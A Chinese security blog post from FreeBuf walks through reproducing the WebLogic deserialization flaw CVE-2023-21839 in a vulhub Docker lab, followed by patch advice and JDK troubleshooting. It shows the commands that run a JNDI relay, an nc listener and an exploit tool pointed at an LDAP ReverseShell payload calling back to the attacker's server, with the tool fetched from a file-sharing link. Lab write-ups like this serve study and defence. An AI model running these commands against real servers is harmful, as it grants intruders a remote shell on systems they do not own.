freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2023-21839 Weblogic反序列化漏洞复现及踩坑
2024-01-23 10:01:15

免责声明

本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!

正文

1.环境搭建

docker-compose搭建,下载地址:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

运行命令:
docker-compose up -d
然后访问ip:7001/console就可以看到weblogic界面了1705974952_65af1ca8918c0ee4c6b54.png!small?1705974953145

2.反弹shell

启动JNDI中转服务

java  -jar JNDIExploit-1.4-SNAPSHOT.jar  -i IP

再监听个端口

nc -lnvp PORT

利用工具进行攻击

https://wwkn.lanzn.com/i89FC1ktgo4f密码:gw0b

CVE-2023-21839.exe -ip 靶机IP -port 7001 -ldap ldap://服务器IP:1389/Basic/ReverseShell/服务器IP/监听端口

1705975010_65af1ce2d19146898cf1f.png!small?1705975011247

1705975024_65af1cf07a1d0cd1e5eba.png!small?1705975024978

3.修复方式

(1)下载最新补丁,链接:https://support.oracle.com/rs?type=doc&id=2917213.2

(2)限制T3协议访问

4.踩坑

1705975067_65af1d1bd56500be58187.png!small?1705975068408

JNDI服务这里报错了

"in thread "LDAPListener client connection reader for connection from xxx to xxxxx:1389" java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x26933859) cannot access class com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.runtime to unnamed module @0x26933859"

查了一下,是因为JDK版本的问题,这里附上常规解决方法,实际遇到得根据服务器的版本去下载JDK和修改环境变量

# 移除openjdk
apt-get remove openjdk*apt autoremove
# 下载需要安装的java版本
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html
# 安装
cp jdk-8u202-linux-x64.tar.gz /opt  #将压缩包移动至/opt文件夹tar -xvzf jdk-8u202-linux-x64.tar.gz  #将压缩包解压至当前文件夹cd jdk1.8.0_202  #进入解压好的文件夹vi /etc/profile用vi编辑器打开profile文件
在文件尾部加入以下信息:
export JAVA_HOME=/opt/jdk1.8.0_202export CLASSPATH=.:${JAVA_HOME}/libexport PATH=${JAVA_HOME}/bin:$PATH
# 保存退出
source /etc/profile
# 维护符号链接
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1update-alternatives --set java /opt/jdk1.8.0_202/bin/javaupdate-alternatives --set javac /opt/jdk1.8.0_202/bin/javac
# 查看结果
java -version
# 漏洞 # 渗透测试 # 网络安全 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录